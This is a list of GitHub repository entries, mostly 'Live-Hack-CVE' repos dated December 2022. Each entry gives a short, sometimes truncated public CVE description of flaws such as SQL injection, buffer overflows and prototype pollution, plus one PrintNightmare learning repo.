**A CWE-191: Integer Underflow (Wrap or Wraparound) vulnerability exists that could cause a denial of service of the controller due to memory access violations when using the Modbus TCP protocol. Affected products: Modicon M340 CPU (part numbers BMXP34*)(V3.40 and prior), Modicon M580 CPU (part numbers BMEP* and BMEH*)(V CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37301](https://github.com/Live-Hack-CVE/CVE-2022-37301) create time: 2022-12-28T02:36:16Z

**When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26885](https://github.com/Live-Hack-CVE/CVE-2022-26885) create time: 2022-12-28T02:36:13Z

**A CWE-269: Improper Privilege Management vulnerability exists that could cause a denial of service of the Ethernet communication of the controller when sending a specific request over SNMP. Affected products: Modicon M340 CPUs(BMXP34* versions prior to V3.40), Modicon M340 X80 Ethernet Communication modules:BMXNOE0100 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0222](https://github.com/Live-Hack-CVE/CVE-2022-0222) create time: 2022-12-28T02:36:03Z

**iTerm2 before 3.4.18 mishandles a DECRQSS response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45872](https://github.com/Live-Hack-CVE/CVE-2022-45872) create time: 2022-12-28T02:35:59Z

**A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/RoleStore.java deleteRole function is affected when the API interface /auth/v1/roles/ is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45932](https://github.com/Live-Hack-CVE/CVE-2022-45932) create time: 2022-12-28T02:35:56Z

**The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45868](https://github.com/Live-Hack-CVE/CVE-2022-45868) create time: 2022-12-28T02:35:52Z

**A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java deleteUser function is affected when the API interface /auth/v1/users/ is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45931](https://github.com/Live-Hack-CVE/CVE-2022-45931) create time: 2022-12-28T02:35:49Z

**A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/DomainStore.java deleteDomain function is affected for the /auth/v1/domains/ API interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45930](https://github.com/Live-Hack-CVE/CVE-2022-45930) create time: 2022-12-28T02:35:45Z

**The WebConfig functionality of Epson TM-C3500 and TM-C7500 devices with firmware version WAM31500 allows authentication bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36133](https://github.com/Live-Hack-CVE/CVE-2022-36133) create time: 2022-12-28T02:35:20Z

**In F-Secure Endpoint Protection for Windows and macOS before channel with Capricorn database 2022-11-22_07, the aerdl.dll unpacker handler crashes. This can lead to a scanning engine crash, triggerable remotely by an attacker for denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38166](https://github.com/Live-Hack-CVE/CVE-2022-38166) create time: 2022-12-28T02:35:17Z

**shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4235](https://github.com/Live-Hack-CVE/CVE-2013-4235) create time: 2022-12-28T00:31:26Z

**Cross-site scripting (XSS) vulnerability in the Dashboard Backend service (stats/dashboard.jsp) in SonicWall Network Security Appliance (NSA) 2400 allows remote attackers to inject arbitrary web script or HTML via the sn parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2589](https://github.com/Live-Hack-CVE/CVE-2014-2589) create time: 2022-12-28T01:06:07Z

**Multiple heap-based buffer overflows in 3S-Smart CODESYS Gateway Server before 2.3.9.34 allow remote attackers to execute arbitrary code via opcode (1) 0x3ef or (2) 0x3f0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6460](https://github.com/Live-Hack-CVE/CVE-2015-6460) create time: 2022-12-28T01:06:03Z

**Heap-based Buffer Overflow in the psf_binheader_writef function in common.c in libsndfile through 1.0.28 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12562](https://github.com/Live-Hack-CVE/CVE-2017-12562) create time: 2022-12-28T01:06:00Z

**Two errors in the "asn1_find_node()" function (lib/parser_aux.c) within GnuTLS libtasn1 version 4.10 can be exploited to cause a stacked-based buffer overflow by tricking a user into processing a specially crafted assignments file via the e.g. asn1Coding utility. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-6891](https://github.com/Live-Hack-CVE/CVE-2017-6891) create time: 2022-12-27T23:49:31Z

**An exploitable buffer overflow vulnerability exists in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3893](https://github.com/Live-Hack-CVE/CVE-2018-3893) create time: 2022-12-28T01:05:57Z

**An exploitable buffer overflow vulnerability exists in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 Firmware version 0.20.17. The strncpy call overflows the destination buffer, which has a size of 52 bytes. An attacker can send an arbitrarily long 'endTime' value in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3895](https://github.com/Live-Hack-CVE/CVE-2018-3895) create time: 2022-12-28T01:05:53Z

**An exploitable buffer overflow vulnerabilities exist in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub with Firmware version 0.20.17. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. The strncpy cal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3897](https://github.com/Live-Hack-CVE/CVE-2018-3897) create time: 2022-12-28T01:05:32Z

**An exploitable buffer overflow vulnerabilities exist in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub with Firmware version 0.20.17. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. The strncpy cal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3896](https://github.com/Live-Hack-CVE/CVE-2018-3896) create time: 2022-12-28T01:05:28Z

**An exploitable buffer overflow vulnerability exists in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250-Firmware version 0.20.17. The strncpy call overflows the destination buffer, which has a size of 52 bytes. An attacker can send an arbitrarily long "startTime" value CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3894](https://github.com/Live-Hack-CVE/CVE-2018-3894) create time: 2022-12-28T01:05:11Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused resulting in arbitrary code execution. An attacker needs to trick the user to open the maliciou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3853](https://github.com/Live-Hack-CVE/CVE-2018-3853) create time: 2022-12-28T00:29:56Z

**An exploitable information disclosure vulnerability exists in the password protection functionality of Quicken Deluxe 2018 for Mac version 5.2.2. A specially crafted sqlite3 request can cause the removal of the password protection, allowing an attacker to access and modify the data without knowing the password. An atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3854](https://github.com/Live-Hack-CVE/CVE-2018-3854) create time: 2022-12-28T00:29:53Z

**An exploitable denial of service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate resulting in denial of service. An attacker can send a crafted TCP packet to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3852](https://github.com/Live-Hack-CVE/CVE-2018-3852) create time: 2022-12-28T00:29:49Z

**An exploitable vulnerability exists in the smart cameras RTSP configuration of the Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The device incorrectly handles spaces in the URL field, leading to an arbitrary operating system command injection. An attacker can send a series of HTTP requests to trigger CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3856](https://github.com/Live-Hack-CVE/CVE-2018-3856) create time: 2022-12-28T00:29:46Z

**API Connect V2018.1 through 2018.4.1.1 is impacted by access token leak. Authorization tokens in some URLs can result in the tokens being written to log files. IBM X-Force ID: 155626. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4008](https://github.com/Live-Hack-CVE/CVE-2019-4008) create time: 2022-12-28T00:28:34Z

**A prototype pollution attack in cached-path-relative versions <=1.0.1 allows an attacker to inject properties on Object.prototype which are then inherited by all the JS objects through the prototype chain causing a DoS attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16472](https://github.com/Live-Hack-CVE/CVE-2018-16472) create time: 2022-12-28T00:25:13Z

**The DGifDecompressLine function in dgif_lib.c in GIFLIB (possibly version 3.0.x), as later shipped in cgif.c in sam2p 0.49.4, has a heap-based buffer overflow because a certain "Private->RunningCode - 2" array index is not checked. This will lead to a denial of service or possibly unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11490](https://github.com/Live-Hack-CVE/CVE-2018-11490) create time: 2022-12-28T00:24:27Z

**An issue was discovered in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to gain sensitive information via the action parameter to /system/user/modules/mod_users/controller.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28607](https://github.com/Live-Hack-CVE/CVE-2022-28607) create time: 2022-12-27T23:53:05Z

**SQL Injection vulnerability in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to execute arbitrary commands via the username parameter to /system/user/modules/mod_users/controller.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30528](https://github.com/Live-Hack-CVE/CVE-2022-30528) create time: 2022-12-27T23:52:57Z

**In AngularJS before 1.7.9 the function `merge()` could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10768](https://github.com/Live-Hack-CVE/CVE-2019-10768) create time: 2022-12-28T01:16:16Z

**SugarCRM before 8.0.4 and 9.x before 9.0.2 allows PHP object injection in the UpgradeWizard module by an Admin user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17317](https://github.com/Live-Hack-CVE/CVE-2019-17317) create time: 2022-12-28T01:16:13Z

**vega-util prior to 1.13.1 allows manipulation of object prototype. The 'vega.mergeConfig' method within vega-util could be tricked into adding or modifying properties of the Object.prototype. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10806](https://github.com/Live-Hack-CVE/CVE-2019-10806) create time: 2022-12-28T01:15:47Z

**IBM MQ 8.0.0.4 - 8.0.0.12, 9.0.0.0 - 9.0.0.6, 9.1.0.0 - 9.1.0.2, and 9.1.0 - 9.1.2 AMQP Listeners could allow an unauthorized user to conduct a session fixation attack due to clients not being disconnected as they should. IBM X-Force ID: 159352. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4227](https://github.com/Live-Hack-CVE/CVE-2019-4227) create time: 2022-12-28T01:15:26Z

**A IBM Spectrum Protect 7.l client backup or archive operation running for an HP-UX VxFS object is silently skipping Access Control List (ACL) entries from backup or archive if there are more than twelve ACL entries associated with the object in total. As a result, it could allow a local attacker to restore or retrieve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4236](https://github.com/Live-Hack-CVE/CVE-2019-4236) create time: 2022-12-28T01:14:50Z

**IBM PureApplication System 2.2.3.0 through 2.2.5.3 could allow an authenticated user with local access to bypass authentication and obtain administrative access. IBM X-Force ID: 159467. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4241](https://github.com/Live-Hack-CVE/CVE-2019-4241) create time: 2022-12-28T01:14:40Z

**IBM QRadar SIEM 7.2 and 7.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 159132. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4212](https://github.com/Live-Hack-CVE/CVE-2019-4212) create time: 2022-12-28T01:14:29Z

**IBM Daeja ViewONE Virtual 5.0 through 5.0.6 could expose internal parameters to ViewONE clients that could be used in further attacks against the system. IBM X-Force ID: 159521. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4246](https://github.com/Live-Hack-CVE/CVE-2019-4246) create time: 2022-12-28T01:14:26Z

**IBM QRadar SIEM 7.2 and 7.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159131. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4211](https://github.com/Live-Hack-CVE/CVE-2019-4211) create time: 2022-12-28T01:14:23Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4249](https://github.com/Live-Hack-CVE/CVE-2019-4249) create time: 2022-12-28T01:14:16Z

**IBM PureApplication System 2.2.3.0 through 2.2.5.3 weakness in the implementation of locking feature in pattern editor. An attacker by intercepting the subsequent requests can bypass business logic to modify the pattern to unlocked state. IBM X-Force ID: 159416. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4234](https://github.com/Live-Hack-CVE/CVE-2019-4234) create time: 2022-12-28T01:14:13Z

**IBM PureApplication System 2.2.3.0 through 2.2.5.3 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 159417. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4235](https://github.com/Live-Hack-CVE/CVE-2019-4235) create time: 2022-12-28T01:14:09Z

**A Cross-Frame Scripting vulnerability in IBM InfoSphere Information Server 11.3, 11.5, and 11.7 can allow an attacker to load the vulnerable application inside an HTML iframe tag on a malicious page. IBM X-Force ID: 159419. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4237](https://github.com/Live-Hack-CVE/CVE-2019-4237) create time: 2022-12-28T01:14:06Z

**An issue was discovered in the Linux kernel before 5.0.7. A NULL pointer dereference can occur when megasas_create_frame_pool() fails in megasas_alloc_cmds() in drivers/scsi/megaraid/megaraid_sas_base.c. This causes a Denial of Service, related to a use-after-free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11810](https://github.com/Live-Hack-CVE/CVE-2019-11810) create time: 2022-12-28T01:13:42Z

**Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0230](https://github.com/Live-Hack-CVE/CVE-2019-0230) create time: 2022-12-28T01:13:05Z

**utilitify prior to 1.0.3 allows modification of object properties. The merge method could be tricked into adding or modifying properties of the Object.prototype. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10808](https://github.com/Live-Hack-CVE/CVE-2019-10808) create time: 2022-12-28T01:10:21Z

**IBM WebSphere Application Server Liberty could allow a remote attacker to obtain sensitive information caused by the improper setting of a cookie. IBM X-Force ID: 160951. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4305](https://github.com/Live-Hack-CVE/CVE-2019-4305) create time: 2022-12-28T01:08:47Z

**IBM WebSphere Application Server - Liberty could allow a remote attacker to bypass security restrictions caused by improper session validation. IBM X-Force ID: 160950. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4304](https://github.com/Live-Hack-CVE/CVE-2019-4304) create time: 2022-12-28T01:08:44Z

**IBM Intelligent Operations Center V5.1.0 - V5.2.0, IBM Intelligent Operations Center for Emergency Management V5.1.0 - V5.1.0.6, and IBM Water Operations for Waternamics V5.1.0 - V5.2.1.1 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4321](https://github.com/Live-Hack-CVE/CVE-2019-4321) create time: 2022-12-28T01:08:40Z

**IBM i 7.4 users who have done a Restore User Profile (RSTUSRPRF) on a system which has been configured with Db2 Mirror for i might have user profiles with elevated privileges caused by incorrect processing during a restore of multiple user profiles. A user with restore privileges could exploit this vulnerability to obt CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4536](https://github.com/Live-Hack-CVE/CVE-2019-4536) create time: 2022-12-28T01:08:37Z

**IBM Security Access Manager for Enterprise Single Sign-On 8.2.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 164555. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4513](https://github.com/Live-Hack-CVE/CVE-2019-4513) create time: 2022-12-28T01:08:33Z

**IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 164066. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4482](https://github.com/Live-Hack-CVE/CVE-2019-4482) create time: 2022-12-28T01:08:30Z

**IBM DB2 High Performance Unload load for LUW 6.1, 6.1.0.1, 6.1.0.1 IF1, 6.1.0.2, 6.1.0.2 IF1, and 6.1.0.1 IF2 db2hpum_debug is a setuid root binary which trusts the PATH environment variable. A low privileged user can execute arbitrary commands as root by altering the PATH variable to point to a user controlled locatio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4447](https://github.com/Live-Hack-CVE/CVE-2019-4447) create time: 2022-12-28T01:08:26Z

**IBM API Connect 2018.1 through 2018.4.1.6 may inadvertently leak sensitive details about internal servers and network via API swagger. IBM X-force ID: 162947. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4437](https://github.com/Live-Hack-CVE/CVE-2019-4437) create time: 2022-12-28T01:08:23Z

**IBM DB2 High Performance Unload load for LUW 6.1, 6.1.0.1, 6.1.0.1 IF1, 6.1.0.2, 6.1.0.2 IF1, and 6.1.0.1 IF2 db2hpum and db2hpum_debug binaries are setuid root and have built-in options that allow an low privileged user the ability to load arbitrary db2 libraries from a privileged context. This results in arbitrary co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4448](https://github.com/Live-Hack-CVE/CVE-2019-4448) create time: 2022-12-28T01:08:19Z

**IBM Emptoris Sourcing 10.1.0 through 10.1.3, IBM Contract Management 10.1.0 through 10.1.3, and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 generates an error message that includes sensitive information that could be used in further attacks against the system. IBM X-Force ID: 164069. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4485](https://github.com/Live-Hack-CVE/CVE-2019-4485) create time: 2022-12-28T01:08:16Z

**IBM Emptoris Sourcing 10.1.0 through 10.1.3, IBM Contract Management 10.1.0 through 10.1.3, and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 generates an error message that includes sensitive information that could be used in further attacks against the system. IBM X-Force ID: 164068. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4484](https://github.com/Live-Hack-CVE/CVE-2019-4484) create time: 2022-12-28T01:08:12Z

**IBM Security Guardium Big Data Intelligence 4.0 (SonarG) does not properly restrict the size or amount of resources that are requested or influenced by an actor. This weakness can be used to consume more resources than intended. IBM X-Force ID: 161417. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4338](https://github.com/Live-Hack-CVE/CVE-2019-4338) create time: 2022-12-28T01:08:09Z

**IBM Contract Management 10.1.0 through 10.1.3 and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 164067. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4483](https://github.com/Live-Hack-CVE/CVE-2019-4483) create time: 2022-12-28T01:07:40Z

**IBM Business Automation Workflow 18.0.0.0, 18.0.0.1, 18.0.0.2, 19.0.0.1, and 19.0.0.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 162770. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4424](https://github.com/Live-Hack-CVE/CVE-2019-4424) create time: 2022-12-28T01:07:37Z

**Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24939](https://github.com/Live-Hack-CVE/CVE-2020-24939) create time: 2022-12-28T01:15:30Z

**This affects the package multi-ini before 2.1.2. It is possible to pollute an object's prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28460](https://github.com/Live-Hack-CVE/CVE-2020-28460) create time: 2022-12-28T01:15:23Z

**This affects the package multi-ini before 2.1.1. It is possible to pollute an object's prototype by specifying the proto object as part of an array. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28448](https://github.com/Live-Hack-CVE/CVE-2020-28448) create time: 2022-12-28T01:15:19Z

**The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7774](https://github.com/Live-Hack-CVE/CVE-2020-7774) create time: 2022-12-28T01:14:46Z

**This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7788](https://github.com/Live-Hack-CVE/CVE-2020-7788) create time: 2022-12-28T01:14:43Z

**Prototype pollution vulnerability in 'deephas' versions 1.0.0 through 1.0.5 allows attacker to cause a denial of service and may lead to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28271](https://github.com/Live-Hack-CVE/CVE-2020-28271) create time: 2022-12-28T01:14:36Z

**Prototype pollution vulnerability in 'controlled-merge' versions 1.0.0 through 1.2.0 allows attacker to cause a denial of service and may lead to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28268](https://github.com/Live-Hack-CVE/CVE-2020-28268) create time: 2022-12-28T01:14:33Z

**Prototype pollution vulnerability in 'field' versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28269](https://github.com/Live-Hack-CVE/CVE-2020-28269) create time: 2022-12-28T01:14:19Z

**This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7746](https://github.com/Live-Hack-CVE/CVE-2020-7746) create time: 2022-12-28T01:14:02Z

**This affects all versions of package json-ptr. The issue occurs in the set operation (https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.htmlset) when the force flag is set to true. The function recursively set the property in the target object, however it does not properly check the key being set, le CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7766](https://github.com/Live-Hack-CVE/CVE-2020-7766) create time: 2022-12-28T01:13:59Z

**The package grpc before 1.24.4; the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7768](https://github.com/Live-Hack-CVE/CVE-2020-7768) create time: 2022-12-28T01:13:56Z

**This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7770](https://github.com/Live-Hack-CVE/CVE-2020-7770) create time: 2022-12-28T01:13:52Z

**This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7709](https://github.com/Live-Hack-CVE/CVE-2020-7709) create time: 2022-12-28T01:13:48Z

**This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7748](https://github.com/Live-Hack-CVE/CVE-2020-7748) create time: 2022-12-28T01:13:45Z

**All versions of package safetydance are vulnerable to Prototype Pollution via the set function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7737](https://github.com/Live-Hack-CVE/CVE-2020-7737) create time: 2022-12-28T01:13:12Z

**The package bmoor before 0.8.12 are vulnerable to Prototype Pollution via the set function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7736](https://github.com/Live-Hack-CVE/CVE-2020-7736) create time: 2022-12-28T01:13:02Z

**All versions of package gedi are vulnerable to Prototype Pollution via the set function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7727](https://github.com/Live-Hack-CVE/CVE-2020-7727) create time: 2022-12-28T01:12:47Z

**All versions of package safe-object2 are vulnerable to Prototype Pollution via the setter function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7726](https://github.com/Live-Hack-CVE/CVE-2020-7726) create time: 2022-12-28T01:12:44Z

**All versions of package worksmith are vulnerable to Prototype Pollution via the setValue function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7725](https://github.com/Live-Hack-CVE/CVE-2020-7725) create time: 2022-12-28T01:12:30Z

**All versions of package tiny-conf are vulnerable to Prototype Pollution via the set function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7724](https://github.com/Live-Hack-CVE/CVE-2020-7724) create time: 2022-12-28T01:12:27Z

**All versions of package promisehelpers are vulnerable to Prototype Pollution via the insert function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7723](https://github.com/Live-Hack-CVE/CVE-2020-7723) create time: 2022-12-28T01:12:23Z

**All versions of package nodee-utils are vulnerable to Prototype Pollution via the deepSet function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7722](https://github.com/Live-Hack-CVE/CVE-2020-7722) create time: 2022-12-28T01:12:19Z

**The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: Version 0.10.0 is a breaking change removing the vulnerable functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7720](https://github.com/Live-Hack-CVE/CVE-2020-7720) create time: 2022-12-28T01:12:16Z

**All versions of package node-oojs are vulnerable to Prototype Pollution via the setPath function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7721](https://github.com/Live-Hack-CVE/CVE-2020-7721) create time: 2022-12-28T01:12:12Z

**Versions of package locutus before 2.0.12 are vulnerable to prototype Pollution via the php.strings.parse_str function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7719](https://github.com/Live-Hack-CVE/CVE-2020-7719) create time: 2022-12-28T01:12:09Z

**All versions of package gammautils are vulnerable to Prototype Pollution via the deepSet and deepMerge functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7718](https://github.com/Live-Hack-CVE/CVE-2020-7718) create time: 2022-12-28T01:12:05Z

**A flaw was found in the Linux kernels implementation of audit rules, where a syscall can unexpectedly not be correctly not be logged by the audit subsystem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35501](https://github.com/Live-Hack-CVE/CVE-2020-35501) create time: 2022-12-28T01:12:02Z

**All versions of package confucious are vulnerable to Prototype Pollution via the set function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7714](https://github.com/Live-Hack-CVE/CVE-2020-7714) create time: 2022-12-28T01:11:58Z

**All versions of package deep-get-set are vulnerable to Prototype Pollution via the main function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7715](https://github.com/Live-Hack-CVE/CVE-2020-7715) create time: 2022-12-28T01:11:55Z

**The package irrelon-path before 4.7.0; the package @irrelon/path before 4.7.0 are vulnerable to Prototype Pollution via the set, unSet, pushVal and pullVal functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7708](https://github.com/Live-Hack-CVE/CVE-2020-7708) create time: 2022-12-28T01:11:51Z

**Learn about the vulnerability known as PrintNightmare (CVE-2021-1675) and (CVE-2021-34527)** : [r1skkam/PrintNightmare](https://github.com/r1skkam/PrintNightmare) create time: 2022-12-28T01:29:31Z

**A flaw was found in htmldoc in v1.9.12. Heap buffer overflow in pspdf_prepare_page(),in ps-pdf.cxx may lead to execute arbitrary code and denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26252](https://github.com/Live-Hack-CVE/CVE-2021-26252) create time: 2022-12-28T01:16:20Z

